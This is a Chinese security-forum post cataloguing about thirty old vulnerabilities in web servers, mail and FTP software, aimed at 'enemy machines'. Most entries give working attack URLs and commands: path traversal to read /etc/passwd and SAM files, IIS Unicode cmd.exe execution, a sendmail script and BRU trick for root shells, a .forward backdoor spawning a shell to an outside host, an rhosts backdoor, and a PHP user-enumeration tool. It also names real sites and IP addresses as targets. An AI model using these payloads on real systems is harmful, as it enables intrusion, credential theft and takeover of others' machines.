|
 | 作者: nightcolor [nightcolor]
 版主 |
登录 |
| 101 名字: Roxen Web Server 描述:Roxen Web Server如果在url中提交%00将暴露目录及目录内容,如果在文件后加上%00将暴露文件源代码:http://target/%00或http://target/file%00 102 名字: SimpleServer 1.06 描述:SimpleServer 1.06 可让用户非法访问任何文件,用户只需要通过%2e这样去调用一个url就可以读任何已知的文件,方法:http://target/%2E%2E/filename 103 名字:JSP源文件暴露 描述:IBM Application Server存在安全问题可以让用户读取jhtml,jsp等文件源代码 例子:正确的访问:http://target/login.jsp获取源代码:http://target/servlet/file/login.jsp 104 名字:暴露真实路径 描述:我发现向IBM WEBSphere Application Server提交一个特殊的URL将暴露文件存放的真实路径 测试:http://61.134.4.176/Commerce/%81showDeck.jsp 105 名字:IBM WEBSPHERE APPLICATION Server 描述:我发现向IBM WEBSphere Application Server提交大于220个"."将会暴露Server真实路径 测试:http://61.139.77.181/servlet/大于220个"." 106 名字:Unix. of Washington pop2d远程读文件 描述:任何一个拥有pop2访问帐号的用户可以读取那机器上的任意文件 查看:攻击方法 http://go18.163.com/'lovehacker/soft/pop2.txt 107 名字:global.asa+.htr 描述:通过浏览器请求global.asa+.htr将暴露global.asa的内容,大家都知道global.asa中保存的有数据库的访问用户名和密码的.方法:http://target/global.asa+.htr 对于.ASP+.htr文件,ISM.DLL会删除其中的大部分内容,但是仍然可能泄漏一些敏感信息,例如包含文件(通常是.inc文件)的名字和路径等等。而对于global.asa文件,通常会将其全部内容显示出来,如果这个文件中包含一些重要敏感信息,例如SQL server数据库的用户名和密码,可能使攻击者更加容易地入侵或者攻击系统。 108 名字:CommuniGate Pro v3.2.4 允许非法读取任意文件 描述:CommuniGate Pro 是一个功能全面的邮件通讯服务器软件,提供 SMTP 发送, POP, IMAP, HTTP 方式接收邮件。CommuniGate 提供一个有效的映象去访问 Web 用户手册,那个 URL /Guide/ 映象到 CommuniGate 子目录树下的一个目录。由于没有检查输入 "../.." ,如果发送一个请求到 web server /Guide/ 映象,使用 "../.." 技术就可看到文件内容。 查看:攻击范例 http://go18.163.com/'lovehacker/soft/communigate.txt 109 名字:Feartech ftp 浏览器出现安全问题 描述:Feartech 的 FTP 浏览器允许你以 html 形式查看目录列表。这将十分方便地管理你的 FTP 文件。由于 FTP 浏览器没有对输入进行正确的检查使任何人能通过浏览器以 WEB server 权限查看系统的任意目录和文件。 攻击方法:http://www.server.com/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc 110 名字:Tnef 存在严重的安全问题 描述:通过指定路径名(如 /etc/passwd )并发送压缩了的邮件到主机的 root 会覆盖密码数据库。这样可以获得管理员权限。 111 名字:WorldClient易损性 描述:那WorldClient的HTTP界面2.1存在一个安全问题,发送一个请求包含../的话,一个远程用户可以找到和下载任何知道确切位置的文件 攻击方法:发送一个请求:http://email.victim.com/..\..\..\winnt\repair\sam._ 112 名字:BB4 Big Brother易损性 描述:远程用户可以查看目录内容或文件对于这BB4 Big Brother 版本 1.4H 及以前版本 攻击方法:发送一个GET请求:http://target/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../directory 将看到目录的内容 113 名字:Front Page 2000 D.O.S攻击 描述:如果和Front Page 2000的shtml.dll建立足够连接,可以占用CPU达100%。 114 名字:Shiva Access Manager RADIUS/Tacacs+ ROOT密码明文存放 描述:Shiva Access Manager RADIUS/Tacacs+产品的LDAP(平台是Solaris)存在一个严重的安全漏洞. 配置S.A.M时,会在LDAP目录下存储所有信息,并且要求输入root DN的用户名和密码,其中的用户名和密码是以明文方式存储在radtac.ini文件中登陆到SERVER,在SHELL提示符下输入: $cat SHIVA_HOME_DIR/insnmgmt/shiva_access_manager/radtac.ini 其它的配置(包括LDAP服务器和端口),也很容易获得。 115 名字:一个轻松获得ROOT的方法 描述:BRU备份软件的毛病,你如果发现了敌人的机器使用BRU备份软件,你能做你想做的事情了。 $ BRUEXECLOG=/etc/passwd $ export BRUEXECLOG $ bru -V ' > hacker::0:0::/:/bin/sh > ' $ su hacker 还有什么好说的,你现在是ROOT啦!用户名:hacker密码: 116 名字:抄别人的一个关于IE的缺陷 描述:这是抄别人的一个漏洞,不过觉得应该引起大家的注意,所以放上来了。可以使用这个方法在敌人的机器上建立autoexec.bat呵呵。参考地址:http://www.nat.bg/'joro/frame2.html(会在你c盘创建一个test.bat,内容是:echo hello) -----------------代码如下--------------------- <IFRAME ID="I1"></IFRAME> <SCRIPT for=I1 event="NavigateComplete2(b)"> alert("Here is your file:\n"+b.document.body.innerText); </SCRIPT> <script> I1.navigate("file://c:/test.txt"); setTimeout('I1.navigate("file://c:/test.txt")',1000); </SCRIPT> --------------------------------------------------- 117 名字:IIS 4.0中的可执行目录 描述:/W3SVC/1/ROOT/msadc /W3SVC/1/ROOT/News /W3SVC/1/ROOT/Mail /W3SVC/1/ROOT/cgi-bin /W3SVC/1/ROOT/SCRIPTS /W3SVC/1/ROOT/IISADMPWD /W3SVC/1/ROOT/_vti_bin /W3SVC/1/ROOT/_vti_bin/_vti_adm /W3SVC/1/ROOT/_vti_bin/_vti_aut 118 名字:.forward后门 描述:Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username' 的 .forward可能设置如下: \username |"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh" 119 名字:Rhosts + + 后门 描述:在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访 问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现. 120 名字:通过port:25获得用户列表 描述:#!/usr/local/bin/php <? /* [PHP] Get Remote User List through sendmail (C)1999 zer9[ISBASE] zer9@21cn.com test on: RH6 with PHP3 */ $LogFile = "./rcpt.log"; function OpenLogRecord() { $fFp = fopen($LogFile,"a"); // are u really want it? } function Usage() { print "Rcpt[PHP] 0.01 by zer9[isbase] mailt0:zer9@21cn.com\n"; print "Usage: ".__FILE__." <Target> "."[Port]\n\n"; exit(); } function EchoRecv($Sock) { $RecvBuf; $RecvChar; while(!feof($Sock)) { return fgets($Sock,1000); } /* while($Count-- != 0) { $RecvBuf .= fgetc($Socket); } print $RecvBuf."\n"; */ } function Init($Sock) { fputs($Sock,"RSET\n"); print EchoRecv($Sock); fputs($Sock,"mail from:zer9@zzz.com\n"); print EchoRecv($Sock); } function FindUser($Sock) { $Dict = "a"; while(1) // hahahhaa '!!#@#@!$## { fputs($Sock,"rcpt to:".$Dict++."\n"); //fputs($Sock,"rcpt to:"."root\n"); //print EchoRecv($Sock); if(strstr(EchoRecv($Sock),"ok")) { print "FindUser: ".$Dict."\n"; } clearstatcache(); //sleep(1); } } function EndGuess($Sock) { fputs($Sock,"quit\n"); } // Main Enter Point // int main(int argc,char *argv[]) $iPort; switch ($argc) { case 2 : $iPort = 25;break; case 3 : $iPort = $argv[2];break; default : Usage(); } $Socket = fsockopen($argv[1], $iPort, &$errno, &$errstr); if(!$Socket) { echo "$errstr ($errno)\n"; } print EchoRecv($Socket); fputs($Socket,"HELP\n"); for($i = 1; $i <= 10 ; $i++) { $RecvBuff = EchoRecv($Socket); print $RecvBuff; /* if(strstr($RecvBuff,"RCPT")) {? print "n1ce!find: RCPT\n"; break; } else { print "sorry,no cmd "rcpt",but exit..."; fclose($Socket); exit(); } */ } Init($Socket); FindUser($Socket); EndGuess($Socket); fclose($Socket); // END ?> 121 名字:Translate: f 描述:如果IIS 5.0接收到一个包含特殊头格式(Translate: f)的HTTP请求,同时URL末尾包含一特殊字符("/")的话,IIS 会错误得调用脚本处理引擎,可能导致文件源码泄漏给远程用户,(asp,asa)等原码。 122 名字:Wingate V2.1的漏洞 描述:如果一个安装了Wingate 2.1的server,安装后没有重新配置 Logfile service(在Gatekeeper项,应该把 Logfile ervices bindings设置为不允许外来的连接到任何接口。除了内部的, 信任的ip外,其它的访问应该拒绝),缺省的选项是允许,那么, 任何人用http://server地址:8010这个方式,结果就有两个, 要不是:"连接失败"或者是看到wingate server安装的那个硬盘。客户具有访问这个硬盘的权限。因为Logfile services 侦听的就是 8010 端口。用wingate server或者proxy server扫描器,专门扫 8010端口,就可以找到漏洞目标。 123 名字:loadpage.cgi 描述:可以用来查看任意文件,首先用浏览器找到当前路径,如:http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ 这时可能会返回一个错误信息: Cannot open file /home/www/shop/XYZ 现在可以替换为下面的格式,如: http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../<路径>/<文件名> 具体如下: http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=../../etc/passwd 124 名字:search.cgi 描述:查看文件和执行命令,用管道命令替换数据库字段或者path/filename。ttp://www.example.com/cgi-bin/search.cgi?user_id=1&database=<输入任意信息>&template=<输入任意信息>&distinct=1 采用的该系统的服务器有,可以去altavista搜索。 floralstuff.com, amazinggates.com, onlinetraders.com, riccardosmarket.com, xstitches.com,search4u.org , jojomamanbebe.co.uk, armysurplus.com, cheddarbox.com, fleamarketbooks.com, framer.com, hkmusic.com, battenburg-lace-shirts.com, teamdawg.com , museek.net, music123.com, candlesdelight.com, harvest.org, robertsliardon.org, or ganicstoyou.com,classic-collectibles.com, finestkind.net, partytimesaver.com, kkoriginals.com, blackmetal.com 125 名字:老旧FTP 描述:[1]连接到FTP Server. [2] 当系统要求你输入UserName时[Enter]不管它 [3] Password输入--> "quote user ftp" [4] 接著再输入--> "quote cwd 'root" [5] 再输入--> "quote pass ftp" 这种方法似乎只能用在很老旧的FTP Server上 ,以国内目前的机器应该都不会成功的,如果你想要试试的话,找国外大学的FTP Server试试看吧!!依照上面的步骤会产生甚么样的结果??Hee..he.你就是root啦 !! 126 名字:Linux 1.2.13 漏洞之一 描述:[1]Telnet到yournet.net [2] Login之后输入--> "finger @yournet.net" [3] 再-->"finger root@yournet.net" 等root 来 login [4] 用WWW Browser 连 到 www.yournet.net [5] Location 输 入 -->"www.yournet.net/cgi-bin/nph-test-cgi/*" [6] 回到Telnet 软 体 -->"cp /bin/sh /tmp/.sh" [7] 再输入--> "chmod 4755 /tmp/.sh"(You're root now!!) 127 名字:Xfree86 3.1.2有个漏洞能让别人删除"任何"档案 描述:用 这 个 Script 试 试 看 ... --- cut here, start code exploit.sh -------------------- !/bin/sh echo Running exploit to check the Xfree86 3.1.2 hole! echo Creating file called /tmp/blah which will contain a few words. echo "This version is NOT exploitable!" >/tmp/blah ln -s /tmp/blash /tmp/.tX0-lock startx echo Now Check /tmp/blah and if it says: echo \"This version is NOT exploitable!\" echo then the version you have is not exploitable! echo Otherwise, it should have a few numbers, then it is exploitable! --- cut here, end of code exploit.sh ------------------- 128 名字:SendMail 描述:适用于版本8.7-8.8.2for Linux,FreeBSD,和其它的UNIX系统。 $ telnet localhost 25 <----------打 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 localhost ESMTP Sendmail 8.7.5/8.7.3; Thu, 25 Dec 1997 15:17:46 +0 800 quit <----------确定版本,是8.7到8.8.2中的版 本,然後离开 221 localhost closing connection Connection closed by foreign host. $ cat >send.sh <--------照打 ----------------------------send.sh开始-------------------------- #/bin/sh echo 'main() '>>leshka.c echo '{ '>>leshka.c echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c echo '} '>>leshka.c # # echo 'main() '>>smtpd.c echo '{ '>>smtpd.c echo ' setuid(0); setgid(0); '>>smtpd.c echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c echo '} '>>smtpd.c # # cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c ./leshka kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:dig it:]" "\n" |head -n 1` rm leshka.c leshka smtpd.c /tmp/smtpd echo "Now type: /tmp/sh" -------------------------------send.sh结束------------------- $ chmod 755 send.sh <------------变可执行档 $ ./send.sh <------------执行 Now type: /tmp/sh $ /tmp/sh <---------照打 # whoami <---------看看你是谁 root <---------到手啦!!! 129 名字:MalFORMed Hit-Hightlighting Argument 描述: http://www.securiteam.com/windowsntfocus/Exploit_details_for_the_IIS__MalFORMed_Hit-Highlighting_Argument__vulnerability.html http://www.xxxasia.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/logfiles/w3svc1/ex000121.log &CiRestriction=none&CiHiliteType=Full 130 名字:Win2k IIS UNICODE 漏洞 (MS,缺陷) 描述: win2k 或NT 4 + IIS 4/IIS 5 通过这些特殊字符攻击者可绕过 IIS 的目录审计远程访问计算机上的任意文件或执行任意命令: http://www.linux.org.cn/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 这个漏洞是由编码引起的,%c0%af 与 %c1%9c 的编码是/和\,也可能会导致产生同样效果。 我们也可以利用此BUG得到一些系统文件的内容 http://192.168.8.48/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini 如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。 http://192.168.8.100/default.asp/a.exe/..%c1%1c../..%c1%1c../winnt/winnt.ini 对于英文版的IIS 4.0/5.0, 此问题同样存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c". 好多站点\inetpub\下的scripts目录删除了,但\Program Files\Common Files\System\下 的msadc还在 (有msadcs.dll漏洞的话就不用 %c1%1c了)。 这时可以如下构造请求: http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ 131 名字:web_store.cgi 描述: http://example.com/cgi-bin/Web_store/web_store.cgi?page=../../../../. ./../../../etc/passwd%00.html web_store.cgi一定判断了后缀必须为.html才能访问,否则报错!不过程序并未对文件存放的目录做检查,所以通过输入../../退到/etc目录,并通过%00.html欺骗程序,访问的是个.html文件!所以就造成了passwd文件内容暴露! 132 名字:BBS2WWW 1.33 泄漏文件和目录内容漏洞 描述:BBS2WWW是上海交大计算机应用工作室(http://cas.tsx.org/)专为Firebird BBS开发的WWW界面,它使得用户不必telnet登录到BBS中就可以使用BBS的各项功能。 BBS2WWW 1.33版本中CGI函数存在一个缺陷,如果提交的链接中某些变量包含"../"字符串,远程用户就可能获取任何文件(以Web Server身份)的内容,也可以浏览有访问权限的目录。 另外,如果用户修改变量试图查看不存在的文件,将会泄漏bbs系统在硬盘上的物理路径。 Description ------------------ 1. 泄漏BBS系统的物理路径 http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=M.971439268 将返回: Error in opening file /home1/hhfeng/bbs/home/boards/sysop/M.971439268 2. 查看系统文件 http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../etc/passwd http://bbs.victim.edu.cn/cgi-bin/bbscon?board=sysop&file=../../../../../../home1/hhfeng/bbs/home/.PASSWDS .PASSWDS文件保存了BBS系统中用户的账号、密码等信息,如果被下载,可以用John进行暴力破解。 Solutions --------------- 在拆分Name/value对的CGI库函数部分,加上以下内容: if (strstr (cgi_entries.value, "..") != NULL && strstr (cgi_entries.name, "passwd") == NULL && strstr (cgi_entries.name, "title") == NULL && strstr (cgi_entries.name, "text") == NULL ) show_error ("Error input!"); 即除了用户密码、文章标题和文章内容,其它输入均需要过滤".."字符串。 国内很多高校BBS2WWW仍使用1.33或者以前的版本,请尽快修补或者升级到1.34版本。 |
| 地主 发表时间: 09/08 00:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 多种漏洞介绍